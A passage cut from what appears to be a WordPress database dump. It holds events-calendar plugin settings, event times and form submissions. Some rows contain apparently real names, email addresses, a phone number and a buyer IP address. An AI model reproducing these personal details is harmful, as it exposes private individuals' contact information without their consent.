onth_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(185301,268667,'skin','carousel'),(185302,268667,'sk-options','a:20:{s:4:\"list\";a:40:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"status_bar\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";s:20:\"next_previous_button\";s:1:\"1\";s:17:\"display_thumbnail\";s:1:\"1\";}s:4:\"grid\";a:40:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";s:20:\"next_previous_button\";s:1:\"1\";s:17:\"display_thumbnail\";s:1:\"1\";}s:6:\"agenda\";a:19:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:34:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:17:\"order_method_list\";s:3:\"ASC\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:17:\"order_method_grid\";s:3:\"ASC\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:18:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:8:{s:5:\"style\";s:7:\"classic\";s:20:\"next_previous_button\";s:1:\"1\";s:19:\"liquid_date_format1\";s:3:\"F d\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";s:17:\"display_thumbnail\";s:1:\"1\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:23:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"268661\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:10:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:19:\"liquid_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:28:{s:5:\"style\";s:6:\"liquid\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"3\";s:12:\"count_tablet\";s:1:\"2\";s:12:\"count_mobile\";s:1:\"1\";s:5:\"limit\";s:2:\"18\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:4:\"6000\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"1\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"1\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:10:\"pagination\";s:8:\"loadmore\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(185303,268667,'show_only_one_occurrence','0'),(185304,268667,'show_past_events','0'),(185305,268667,'show_only_past_events','0'),(185306,268667,'show_ongoing_events','0'),(185307,268667,'show_only_ongoing_events','0'),(185308,268667,'boldgrid_hide_page_title','0'),(185309,268667,'boldgrid_in_page_containers','0'),(193308,269169,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:14:\"Roger  Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"73.65.223.90\";}}'),(193307,269169,'mec_ticket_price_1','0'),(193306,269169,'mec_booking_location','129'),(193305,269169,'mec_book_date_submit','20231005201836'),(193304,269169,'mec_attention_time_end','1696764600'),(193303,269169,'mec_attention_time_start','1696761000'),(188017,268810,'_field_179','Marc '),(185321,265565,'ex_category',''),(185322,265565,'ex_location',''),(185323,265565,'ex_organizer',''),(185324,265565,'sponsor',''),(185325,268661,'mec_cost_auto_calculate','0'),(185326,268661,'mec_style_per_event','global'),(185327,268661,'mec_trailer_url',''),(185328,268661,'mec_trailer_title',''),(185329,268661,'mec_start_datetime','2023-07-09 01:00 PM'),(185330,268661,'mec_end_datetime','2023-07-09 02:30 PM'),(185331,268661,'mec_sequence','2'),(185332,268661,'mec_event_gallery','a:0:{}'),(185333,268661,'mec_related_events','a:0:{}'),(185334,268661,'mec_banner','a:0:{}'),(185336,268265,'mec_style_per_event','global'),(185337,268265,'mec_trailer_url',''),(185338,268265,'mec_trailer_title',''),(185339,268265,'mec_start_datetime','2023-04-14 07:00 PM'),(185340,268265,'mec_end_datetime','2023-04-14 08:00 PM'),(185341,268265,'mec_sequence','5'),(192792,269146,'protect_children',''),(192793,269146,'mec_color',''),(192794,269146,'mec_location_id','186'),(192795,269146,'mec_dont_show_map','0'),(185342,268265,'mec_event_gallery','a:0:{}'),(185343,268265,'mec_related_events','a:0:{}'),(185344,268265,'mec_banner','a:0:{}'),(185345,268568,'mec_cost_auto_calculate','0'),(185346,268568,'mec_style_per_event','global'),(185347,268568,'mec_trailer_url',''),(185348,268568,'mec_trailer_title',''),(185349,268568,'mec_start_datetime','2023-06-25 10:30 AM'),(185350,268568,'mec_end_datetime','2023-06-25 11:30 AM'),(185351,268568,'mec_sequence','1'),(185352,268568,'mec_event_gallery','a:0:{}'),(185353,268568,'mec_related_events','a:0:{}'),(185354,268568,'mec_banner','a:0:{}'),(192750,269144,'mec_repeat_type',''),(192749,269144,'mec_repeat_status','0'),(192748,269144,'mec_end_datetime','2023-10-15 11:30 AM'),(192747,269144,'mec_end_day_seconds','41400'),(192746,269144,'mec_end_time_ampm','AM'),(192743,269144,'mec_end_date','2023-10-15'),(192744,269144,'mec_end_time_hour','11'),(192745,269144,'mec_end_time_minutes','30'),(192742,269144,'mec_start_datetime','2023-10-15 10:30 AM'),(192741,269144,'mec_start_day_seconds','37800'),(185365,268479,'mec_cost_auto_calculate','0'),(185366,268479,'mec_style_per_event','global'),(185367,268479,'mec_trailer_url',''),(185368,268479,'mec_trailer_title',''),(185369,268479,'mec_start_datetime','2023-06-25 04:00 PM'),(185370,268479,'mec_end_datetime','2023-06-25 05:30 PM'),(185371,268479,'mec_sequence','1'),(185372,268479,'mec_event_gallery','a:0:{}'),(185373,268479,'mec_related_events','a:0:{}'),(185374,268479,'mec_banner','a:0:{}'),(185375,268406,'mec_cost_auto_calculate','0'),(185376,268406,'mec_style_per_event','global'),(185377,268406,'mec_trailer_url',''),(185378,268406,'mec_trailer_title',''),(185379,268406,'mec_start_datetime','2023-05-07 10:30 AM'),(185380,268406,'mec_end_datetime','2023-05-07 11:30 AM'),(185381,268406,'mec_sequence','1'),(185382,268406,'mec_event_gallery','a:0:{}'),(185383,268406,'mec_related_events','a:0:{}'),(185384,268406,'mec_banner','a:0:{}'),(185385,268530,'mec_cost_auto_calculate','0'),(185386,268530,'mec_style_per_event','global'),(185387,268530,'mec_trailer_url',''),(185388,268530,'mec_trailer_title',''),(185389,268530,'mec_start_datetime','2023-06-17 01:30 PM'),(185390,268530,'mec_end_datetime','2023-06-17 02:30 PM'),(185391,268530,'mec_sequence','2'),(185392,268530,'mec_event_gallery','a:0:{}'),(185393,268530,'mec_related_events','a:0:{}'),(185394,268530,'mec_banner','a:0:{}'),(185395,268461,'mec_cost_auto_calculate','0'),(185396,268461,'mec_style_per_event','global'),(185397,268461,'mec_trailer_url',''),(185398,268461,'mec_trailer_title',''),(185399,268461,'mec_start_datetime','2023-05-20 01:30 PM'),(185400,268461,'mec_end_datetime','2023-05-20 02:30 PM'),(185401,268461,'mec_sequence','5'),(185402,268461,'mec_event_gallery','a:0:{}'),(185403,268461,'mec_related_events','a:0:{}'),(185404,268461,'mec_banner','a:0:{}'),(193751,269211,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193750,269211,'_field_651','(402) 327-8121'),(193749,269211,'_field_653','jeffrybuttars@gmail.com'),(193746,7160,'_oembed_time_3d2fa93b2be2fc3fe018c4a8bc757475','1698591813'),(193747,269211,'_field_654','Jeff '),(193748,269211,'_field_652','Buttars '),(185415,266311,'mec_cost_auto_calculate','0'),(185416,266311,'mec_style_per_event','global'),(185417,266311,'mec_trailer_url',''),(185418,266311,'mec_trailer_title',''),(185419,266311,'mec_start_datetime','2022-01-23 10:30 AM'),(185420,266311,'mec_end_datetime','2022-01-23 11:30 AM'),(185421,266311,'mec_sequence','9'),(185422,266311,'mec_event_gallery','a:0:{}'),(185423,266311,'mec_related_events','a:0:{}'),(185424,266311,'mec_banner','a:0:{}'),(185425,268411,'mec_cost_auto_calculate','0'),(185426,268411,'mec_style_per_event','global'),(185427,268411,'mec_trailer_url',''),(185428,268411,'mec_trailer_title',''),(185429,268411,'mec_start_datetime','2023-08-13 10:30 AM'),(185430,268411,'mec_end_datetime','2023-08-13 11:30 AM'),(185431,268411,'mec_sequence','8'),(185432,268411,'mec_event_gallery','a:0:{}'),(185433,268411,'mec_related_events','a:0:{}'),(185434,268411,'mec_banner','a:0:{}'),(185435,268425,'mec_cost_auto_calculate','0'),(185436,268425,'mec_style_per_event','global'),(185437,268425,'mec_trailer_url',''),(185438,268425,'mec_trailer_title',''),(185439,268425,'mec_start_datetime','2023-04-30 10:30 AM'),(185440,268425,'mec_end_datetime','2023-04-30 12:00 PM'),(185441,268425,'mec_sequence','3'),(194826,269322,'_field_652','Stoeklen'),(194825,269322,'_field_654','Rochelle'),(193045,269152,'_field_654','Nicki'),(185442,268425,'mec_event_gallery','a:0:{}'),(185443,268425,'mec_related_events','a:0:{}'),(185444,268425,'mec_banner','a:0:{}'),(188053,268824,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:601;s:6:\"height\";i:301;s:4:\"file\";s:40:\"2023/07/init-esa-confirmation-blue-2.jpg\";s:8:\"filesize\";i:41375;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-350x175.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6929;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18621;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-500x301.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30323;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-474x301.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29074;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20795;}s:8:\"tileview\";a:5:{s:4:\"file\";s:40:\"init-esa-confirmation-blue-2-300x301.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189947,268894,'_field_135','choll.03@comcast.net'),(189946,268894,'_field_134','Testing'),(189945,268894,'_field_133','Test'),(189944,268893,'_seq_num','26'),(189943,268893,'_form_id','10'),(189939,268893,'_field_100','(555) 555-5555'),(189940,268893,'_field_101','Denver'),(189941,268893,'_field_104','Administrative Services 